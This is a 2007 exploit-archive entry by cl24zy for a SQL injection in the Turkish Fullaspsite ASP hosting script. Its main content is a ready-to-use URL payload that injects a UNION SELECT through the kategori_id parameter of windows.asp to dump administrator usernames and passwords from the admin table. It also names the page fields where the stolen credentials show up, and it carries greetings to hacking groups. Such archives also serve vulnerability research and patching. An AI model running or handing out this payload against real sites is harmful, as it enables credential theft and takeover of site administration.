Fullaspsite Asp Hosting Sitesi - 'tr' SQL Injection

EDB-ID:

3233

Author:

cl24zy

Type:

webapps

Platform:

ASP

Published:

2007-01-31

###############################################################
#Fullaspsite Asp Hosting (tr) == SQL Injection Vulnerability
#Author : cl24zy - DrEgHoT - TuF4N
#Site : www.hacklive.org , www.illegal-attack.org
#Contact: admin@hacklive.org
###############################################################
#Download Link Of Fullaspsite Asp Hosting Sitesi (tr) :
http://www.aspindir.com/Goster/4383
#Demo : http://aspsiteler.fullaspsite.com/hosting

#Exploit;
#Admin Nick, Passport;
http://[SITE]/windows.asp?kategori_id=-1%20union+all+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin


#Union data Text;
#Alt Domain : Admin UserName
#Anl.k Trafik : Admin Password

#Greetz: iLLeGaL-ATTaCK//TiM & HacKLivETeaM
################################################################

# milw0rm.com [2007-01-31]